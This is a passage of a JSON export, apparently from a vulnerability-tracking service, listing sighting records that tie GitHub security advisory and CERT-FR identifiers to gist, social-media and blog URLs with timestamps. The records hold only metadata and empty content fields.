"88d91a0d-cd3c-4b48-ac97-27d91a73bcc4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-q3j6-qgpj-74h6", "type": "seen", "source": "https://gist.github.com/konard/beb604d0f86e740a59c10cc19fb9b50b", "content": "", "creation_timestamp": "2026-05-19T19:44:33.000000Z"}, {"uuid": "2e05e905-7567-4caa-9829-487e86eb88bb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-52f5-9888-hmc6", "type": "seen", "source": "https://gist.github.com/konard/beb604d0f86e740a59c10cc19fb9b50b", "content": "", "creation_timestamp": "2026-05-19T19:44:33.000000Z"}, {"uuid": "d2b95393-748b-42e7-acf0-172fe51af67c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-v39h-62p7-jpjc", "type": "seen", "source": "https://gist.github.com/konard/beb604d0f86e740a59c10cc19fb9b50b", "content": "", "creation_timestamp": "2026-05-19T19:44:33.000000Z"}, {"uuid": "52b9e269-e31f-47b6-b73f-ebd996596ef2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jxxr-4gwj-5jf2", "type": "seen", "source": "https://gist.github.com/konard/d8a22725a8b00a188eb2098b18eaa766", "content": "", "creation_timestamp": "2026-05-19T19:42:10.000000Z"}, {"uuid": "e64751d1-5245-41bf-a365-cd384c4e7c7f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-58qx-3vcg-4xpx", "type": "seen", "source": "https://gist.github.com/konard/d8a22725a8b00a188eb2098b18eaa766", "content": "", "creation_timestamp": "2026-05-19T19:42:10.000000Z"}, {"uuid": "a6895686-abf1-4047-bfe0-b0d150fb3928", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-q3j6-qgpj-74h6", "type": "seen", "source": "https://gist.github.com/konard/d8a22725a8b00a188eb2098b18eaa766", "content": "", "creation_timestamp": "2026-05-19T19:42:10.000000Z"}, {"uuid": "7600419c-59e6-4fd2-b2a8-9ceb1724616a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-52f5-9888-hmc6", "type": "seen", "source": "https://gist.github.com/konard/d8a22725a8b00a188eb2098b18eaa766", "content": "", "creation_timestamp": "2026-05-19T19:42:10.000000Z"}, {"uuid": "7bdd7898-66f7-4121-aa19-9bc45995083a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-v39h-62p7-jpjc", "type": "seen", "source": "https://gist.github.com/konard/d8a22725a8b00a188eb2098b18eaa766", "content": "", "creation_timestamp": "2026-05-19T19:42:10.000000Z"}, {"uuid": "afb45a57-2884-46ab-8177-89c77eec02fa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jxxr-4gwj-5jf2", "type": "seen", "source": "https://gist.github.com/konard/dda209bb6e0f954099785c5bc7b24eb2", "content": "", "creation_timestamp": "2026-05-19T20:19:30.000000Z"}, {"uuid": "628b2502-6215-4b59-afbf-1c99b993eb97", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-58qx-3vcg-4xpx", "type": "seen", "source": "https://gist.github.com/konard/dda209bb6e0f954099785c5bc7b24eb2", "content": "", "creation_timestamp": "2026-05-19T20:19:30.000000Z"}, {"uuid": "962a6417-d224-41e5-8587-ed1e2de57212", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-q3j6-qgpj-74h6", "type": "seen", "source": "https://gist.github.com/konard/dda209bb6e0f954099785c5bc7b24eb2", "content": "", "creation_timestamp": "2026-05-19T20:19:30.000000Z"}, {"uuid": "c1e90520-3ef8-4ba8-bc9c-7ddd9d465d96", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-52f5-9888-hmc6", "type": "seen", "source": "https://gist.github.com/konard/dda209bb6e0f954099785c5bc7b24eb2", "content": "", "creation_timestamp": "2026-05-19T20:19:30.000000Z"}, {"uuid": "505fbb42-3956-462a-a87c-2bf39da8a592", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-v39h-62p7-jpjc", "type": "seen", "source": "https://gist.github.com/konard/dda209bb6e0f954099785c5bc7b24eb2", "content": "", "creation_timestamp": "2026-05-19T20:19:30.000000Z"}, {"uuid": "858619a7-4af5-4efb-b742-f60b89f797e0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-hcf7-66rw-9f5r", "type": "seen", "source": "https://gist.github.com/alon710/e381dedd3ac6c2888e1321e911d4bec9", "content": "", "creation_timestamp": "2026-05-19T20:10:50.000000Z"}, {"uuid": "11de5821-d9fa-45b4-a75d-243d3c9d768c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7HGR-7H44-33W2", "type": "seen", "source": "https://gist.github.com/alon710/d948bdbe7f1b3b90439141bced4b12bc", "content": "", "creation_timestamp": "2026-05-19T20:40:52.000000Z"}, {"uuid": "b877580b-b8a5-4687-ad05-7c2c61ab2ffd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jxxr-4gwj-5jf2", "type": "seen", "source": "https://gist.github.com/konard/6638354c65811f088760b0a35778b85b", "content": "", "creation_timestamp": "2026-05-19T21:50:12.000000Z"}, {"uuid": "babb9941-341d-49ba-9925-741df83360a1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-58qx-3vcg-4xpx", "type": "seen", "source": "https://gist.github.com/konard/6638354c65811f088760b0a35778b85b", "content": "", "creation_timestamp": "2026-05-19T21:50:12.000000Z"}, {"uuid": "6c311367-a38b-4e93-a382-c4016c0705ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-q3j6-qgpj-74h6", "type": "seen", "source": "https://gist.github.com/konard/6638354c65811f088760b0a35778b85b", "content": "", "creation_timestamp": "2026-05-19T21:50:12.000000Z"}, {"uuid": "017b1813-2ee7-4344-b5e6-81413653c843", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-52f5-9888-hmc6", "type": "seen", "source": "https://gist.github.com/konard/6638354c65811f088760b0a35778b85b", "content": "", "creation_timestamp": "2026-05-19T21:50:12.000000Z"}, {"uuid": "cacefa62-4b32-4540-9cf2-c40287cd3bb3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-v39h-62p7-jpjc", "type": "seen", "source": "https://gist.github.com/konard/6638354c65811f088760b0a35778b85b", "content": "", "creation_timestamp": "2026-05-19T21:50:12.000000Z"}, {"uuid": "608e3c3f-d5ba-4502-bd3d-9429c1e79bb9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jxxr-4gwj-5jf2", "type": "seen", "source": "https://gist.github.com/konard/1685881b93e9650d489de268add16638", "content": "", "creation_timestamp": "2026-05-19T21:48:20.000000Z"}, {"uuid": "9ccfba16-bde6-44b2-a1c4-4856ba63c86f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-58qx-3vcg-4xpx", "type": "seen", "source": "https://gist.github.com/konard/1685881b93e9650d489de268add16638", "content": "", "creation_timestamp": "2026-05-19T21:48:20.000000Z"}, {"uuid": "707e71c0-6d01-4f4d-bcfe-ccd5450c57b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-q3j6-qgpj-74h6", "type": "seen", "source": "https://gist.github.com/konard/1685881b93e9650d489de268add16638", "content": "", "creation_timestamp": "2026-05-19T21:48:20.000000Z"}, {"uuid": "98b3c790-fa03-4069-b295-95be2c90b252", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-52f5-9888-hmc6", "type": "seen", "source": "https://gist.github.com/konard/1685881b93e9650d489de268add16638", "content": "", "creation_timestamp": "2026-05-19T21:48:20.000000Z"}, {"uuid": "dd5362a1-0d86-4dcd-b93e-2f696989350d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-v39h-62p7-jpjc", "type": "seen", "source": "https://gist.github.com/konard/1685881b93e9650d489de268add16638", "content": "", "creation_timestamp": "2026-05-19T21:48:20.000000Z"}, {"uuid": "ffda7945-59b8-4358-b242-04cd6182a931", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jxxr-4gwj-5jf2", "type": "seen", "source": "https://gist.github.com/konard/52baf67dcda8b8b1aac2bf9b1d2e6b86", "content": "", "creation_timestamp": "2026-05-20T00:09:52.000000Z"}, {"uuid": "2fdb0106-f66c-44ea-bdb6-c6d3dd3d164c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-58qx-3vcg-4xpx", "type": "seen", "source": "https://gist.github.com/konard/52baf67dcda8b8b1aac2bf9b1d2e6b86", "content": "", "creation_timestamp": "2026-05-20T00:09:52.000000Z"}, {"uuid": "aa391461-4592-4f5f-9ba3-49f0c0e78e5a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-q3j6-qgpj-74h6", "type": "seen", "source": "https://gist.github.com/konard/52baf67dcda8b8b1aac2bf9b1d2e6b86", "content": "", "creation_timestamp": "2026-05-20T00:09:52.000000Z"}, {"uuid": "389a37c8-7dd1-4027-b795-dbe391976410", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-52f5-9888-hmc6", "type": "seen", "source": "https://gist.github.com/konard/52baf67dcda8b8b1aac2bf9b1d2e6b86", "content": "", "creation_timestamp": "2026-05-20T00:09:52.000000Z"}, {"uuid": "d1437e84-76d0-46fc-9503-737138a2de32", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-v39h-62p7-jpjc", "type": "seen", "source": "https://gist.github.com/konard/52baf67dcda8b8b1aac2bf9b1d2e6b86", "content": "", "creation_timestamp": "2026-05-20T00:09:52.000000Z"}, {"uuid": "3abd13d6-2a1b-42c4-a3d8-a3a5cf2ce3cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jxxr-4gwj-5jf2", "type": "seen", "source": "https://gist.github.com/konard/c6b5260d8f066126008ae1c84e113122", "content": "", "creation_timestamp": "2026-05-20T00:42:03.000000Z"}, {"uuid": "337694de-cb35-45ef-b800-f7a9345b01ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-58qx-3vcg-4xpx", "type": "seen", "source": "https://gist.github.com/konard/c6b5260d8f066126008ae1c84e113122", "content": "", "creation_timestamp": "2026-05-20T00:42:03.000000Z"}, {"uuid": "2d22ea4c-3eed-4679-b970-84e52135823f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-q3j6-qgpj-74h6", "type": "seen", "source": "https://gist.github.com/konard/c6b5260d8f066126008ae1c84e113122", "content": "", "creation_timestamp": "2026-05-20T00:42:03.000000Z"}, {"uuid": "992a43a4-35f6-4829-afca-cc66e5806cd2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-52f5-9888-hmc6", "type": "seen", "source": "https://gist.github.com/konard/c6b5260d8f066126008ae1c84e113122", "content": "", "creation_timestamp": "2026-05-20T00:42:03.000000Z"}, {"uuid": "ecc3100a-0baf-49df-8904-a32c92d80d15", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-v39h-62p7-jpjc", "type": "seen", "source": "https://gist.github.com/konard/c6b5260d8f066126008ae1c84e113122", "content": "", "creation_timestamp": "2026-05-20T00:42:03.000000Z"}, {"uuid": "f4c487a7-cb8d-47c4-8d5c-f296c0d8af7e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-rg75-q538-x34v", "type": "seen", "source": "https://gist.github.com/alon710/261ffaf79cb2412380434d62f37902b8", "content": "", "creation_timestamp": "2026-05-20T11:20:50.000000Z"}, {"uuid": "62ca633f-2442-42b9-bb75-932e32b45e00", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-j4j8-gpvj-7fqr", "type": "seen", "source": "https://gist.github.com/Atomics-hub/546bf5d8d27b37858eec964a75f37206", "content": "", "creation_timestamp": "2026-05-20T14:58:37.000000Z"}, {"uuid": "06193ced-c3d4-4b55-ba38-979caaa45865", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6x5c-84vm-5j56", "type": "seen", "source": "https://gist.github.com/Atomics-hub/546bf5d8d27b37858eec964a75f37206", "content": "", "creation_timestamp": "2026-05-20T14:58:37.000000Z"}, {"uuid": "3214579e-ff33-41aa-a442-b419518fe8f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7vfx-9hwp-c2x4", "type": "seen", "source": "https://gist.github.com/steig/ddd6193b319e8b70af8f2659034a7922", "content": "", "creation_timestamp": "2026-05-20T15:46:13.000000Z"}, {"uuid": "a82d7770-cce2-42a5-ae9d-582204f1a26a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-73qr-pfmq-6rp6", "type": "seen", "source": "https://gist.github.com/steig/ddd6193b319e8b70af8f2659034a7922", "content": "", "creation_timestamp": "2026-05-20T15:46:13.000000Z"}, {"uuid": "0e77edb3-89a0-4560-aed9-e88273b5a7c7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-g2q5-5433-rhrf", "type": "seen", "source": "https://gist.github.com/steig/ddd6193b319e8b70af8f2659034a7922", "content": "", "creation_timestamp": "2026-05-20T15:46:13.000000Z"}, {"uuid": "d15d6b8c-4792-437f-b087-087d2990c88a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-cxm3-wv7p-998c", "type": "seen", "source": "https://gist.github.com/steig/ddd6193b319e8b70af8f2659034a7922", "content": "", "creation_timestamp": "2026-05-20T15:46:13.000000Z"}, {"uuid": "276495bf-a014-46d7-8f1f-4ee373ca5dd0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5C46-X3QW-Q7J7", "type": "seen", "source": "https://t.me/bdufstecru/3182", "content": "", "creation_timestamp": "2026-05-20T14:50:44.000000Z"}, {"uuid": "0b50a480-c8f1-45ff-9927-eb957c58762d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-CQ46-HP4H-CVFR", "type": "seen", "source": "https://t.me/bdufstecru/3179", "content": "", "creation_timestamp": "2026-05-20T14:47:50.000000Z"}, {"uuid": "a341dd4e-95fd-4091-aae1-3f73b2a02bfc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-chgx-jx3p-rf73", "type": "seen", "source": "https://bsky.app/profile/Whiskeyomega.cupoftea.social.ap.brid.gy/post/3mmceqyeaiq72", "content": "", "creation_timestamp": "2026-05-20T16:56:47.017434Z"}, {"uuid": "319e3792-70e4-4417-84cd-3bc7adf156d3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-53m7-2wrh-q839", "type": "seen", "source": "https://bsky.app/profile/Whiskeyomega.cupoftea.social.ap.brid.gy/post/3mmceqyeaiq72", "content": "", "creation_timestamp": "2026-05-20T16:56:46.837034Z"}, {"uuid": "7ee7d7b7-0bc1-43f0-b808-86a83bc0ff5d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-xx55-4rrg-8xg6", "type": "seen", "source": "https://bsky.app/profile/Whiskeyomega.cupoftea.social.ap.brid.gy/post/3mmceqyeaiq72", "content": "", "creation_timestamp": "2026-05-20T16:56:46.667170Z"}, {"uuid": "6d381eff-84a1-46df-ab20-0f2393ba518b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-crr4-7rm4-8gpw", "type": "seen", "source": "https://bsky.app/profile/Whiskeyomega.cupoftea.social.ap.brid.gy/post/3mmceqyeaiq72", "content": "", "creation_timestamp": "2026-05-20T16:56:46.495546Z"}, {"uuid": "f5b59fcf-e798-4666-a10b-a8bdffb63637", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-w9xh-5f39-vq89", "type": "seen", "source": "https://gist.github.com/alon710/5a6f8f892a6be8e022155f20b43547e4", "content": "", "creation_timestamp": "2026-05-20T18:40:49.000000Z"}, {"uuid": "a8de795d-2cbb-4e41-83cc-c8657822d21e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-gp95-j463-vv28", "type": "seen", "source": "https://gist.github.com/alon710/ab000f54d49f4216c2a377595eab5831", "content": "", "creation_timestamp": "2026-05-20T19:10:50.000000Z"}, {"uuid": "c3d40782-5a0f-4a91-9578-3ad2e62416e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-XVP4-PHQJ-CJR3", "type": "seen", "source": "https://gist.github.com/alon710/cb972f8f962d8bc96860b04de0a95070", "content": "", "creation_timestamp": "2026-05-20T19:40:50.000000Z"}, {"uuid": "69e460c3-7d3b-4029-ae4c-7296bdd192da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-53m7-2wrh-q839", "type": "seen", "source": "https://bsky.app/profile/tesaguri.fedibird.com.ap.brid.gy/post/3mmcsknmcbx22", "content": "", "creation_timestamp": "2026-05-20T21:03:40.594082Z"}, {"uuid": "8d8e35c7-4bb7-45d6-a6ab-8ebaf4af7346", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-c9j4-9m59-847w", "type": "seen", "source": "https://github.blog/security/investigating-unauthorized-access-to-githubs-internal-repositories/", "content": "", "creation_timestamp": "2026-05-20T19:07:38.000000Z"}, {"uuid": "9a481fb3-96f6-452b-9722-3454fe0f1403", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-f5x6-7qgp-jhf3", "type": "seen", "source": "https://gist.github.com/FuzzysTodd/4e10f5b327d09a37dc02a2a08f442f94", "content": "", "creation_timestamp": "2026-05-21T00:45:42.000000Z"}, {"uuid": "d25f8002-25e0-4495-8537-ce26d6abb8f5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-g2xh-c426-v8mf", "type": "seen", "source": "https://gist.github.com/FuzzysTodd/4e10f5b327d09a37dc02a2a08f442f94", "content": "", "creation_timestamp": "2026-05-21T00:45:42.000000Z"}, {"uuid": "98722885-5d45-436f-9447-4347fc8deafe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-9qv9-8xv6-5p35", "type": "seen", "source": "https://gist.github.com/alon710/1978cf3711bfca18edca91ae863c89b9", "content": "", "creation_timestamp": "2026-05-21T03:10:51.000000Z"}, {"uuid": "69757276-81d3-4d55-99a5-441bad9a1a34", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-C2C9-MFW7-P8HW", "type": "seen", "source": "https://gist.github.com/alon710/feabaa614915bfed4bc482d4a78d8681", "content": "", "creation_timestamp": "2026-05-21T05:40:51.000000Z"}, {"uuid": "43d30740-6aa0-4d26-8f28-c644148ee6c7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-59FH-9F3P-7M39", "type": "seen", "source": "https://gist.github.com/alon710/0f9bb6ad84fa652e49398a6746f04f1f", "content": "", "creation_timestamp": "2026-05-21T06:10:50.000000Z"}, {"uuid": "36728957-67f4-4e4a-8cef-765a2360a3e0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-c9j4-9m59-847w", "type": "seen", "source": "https://bsky.app/profile/tech-trending.bsky.social/post/3mmeahvo27p2m", "content": "", "creation_timestamp": "2026-05-21T10:45:20.133244Z"}, {"uuid": "b4ba38dd-cf20-41b6-8f27-fef06f72d473", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-c9j4-9m59-847w", "type": "seen", "source": "https://infosec.exchange/users/decio/statuses/116613650874522243", "content": "", "creation_timestamp": "2026-05-21T17:05:00.998652Z"}, {"uuid": "d43d79fb-1e78-421d-ae50-2d8e59a8c3d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-f9f8-rm49-7jv2", "type": "seen", "source": "https://bsky.app/profile/winsontang.com/post/3mmp2tsdeu62f", "content": "", "creation_timestamp": "2026-05-25T18:03:54.514421Z"}, {"uuid": "1333cd03-7831-4d29-81f8-a105b491f7d6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-023", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/116641075124338987", "content": "", "creation_timestamp": "2026-05-26T13:19:41.388950Z"}, {"uuid": "347599c4-373e-4ae7-9bff-0896e4ae6100", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-023", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3mmr3fxtj3v2b", "content": "", "creation_timestamp": "2026-05-26T13:19:22.541704Z"}, {"uuid": "e6001830-7904-4f49-a0b8-81f01febfc09", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-xxxx-xxxx-xxxx", "type": "seen", "source": "https://gist.github.com/mkrause/9ab4178c905b7e3ab46c5a3e3598adfc", "content": "", "creation_timestamp": "2026-05-26T15:21:17.000000Z"}, {"uuid": "ca1e7d68-f1e1-4833-8760-c3152cfdbd81", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2c2j-9gv5-cj73", "type": "seen", "source": "https://gist.github.com/lesnargitonga/ded68f9d3d270cc386fe7c2227970ebc", "content": "", "creation_timestamp": "2026-05-28T19:29:34.000000Z"}, {"uuid": "fb76cb6e-7579-4164-a304-8a8769eb82dd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-86qp-5c8j-p5mr", "type": "seen", "source": "https://gist.github.com/lesnargitonga/ded68f9d3d270cc386fe7c2227970ebc", "content": "", "creation_timestamp": "2026-05-28T19:29:34.000000Z"}, {"uuid": "26f4455e-1632-43c5-b6fb-0e1847271447", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-f96h-pmfr-66vw", "type": "seen", "source": "https://gist.github.com/lesnargitonga/ded68f9d3d270cc386fe7c2227970ebc", "content": "", "creation_timestamp": "2026-05-28T19:29:34.000000Z"}, {"uuid": "ad93229a-918b-4249-af17-7461403b1e94", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-hx9q-6w63-j58v", "type": "seen", "source": "https://gist.github.com/lesnargitonga/ded68f9d3d270cc386fe7c2227970ebc", "content": "", "creation_timestamp": "2026-05-28T19:29:34.000000Z"}, {"uuid": "6b55468b-101a-474a-9fc7-2725036f5c7c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6w46-j5rx-g56g", "type": "seen", "source": "https://gist.github.com/lesnargitonga/ded68f9d3d270cc386fe7c2227970ebc", "content": "", "creation_timestamp": "2026-05-28T19:29:34.000000Z"}, {"uuid": "ccecf65d-273e-40a9-8f19-f72eff847482", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-rv6j-5jc6-w6p5", "type": "seen", "source": "https://gist.github.com/Nexory/f6bb07c8203741740b7413e3fb5b5c3e", "content": "", "creation_timestamp": "2026-05-29T01:01:28.000000Z"}, {"uuid": 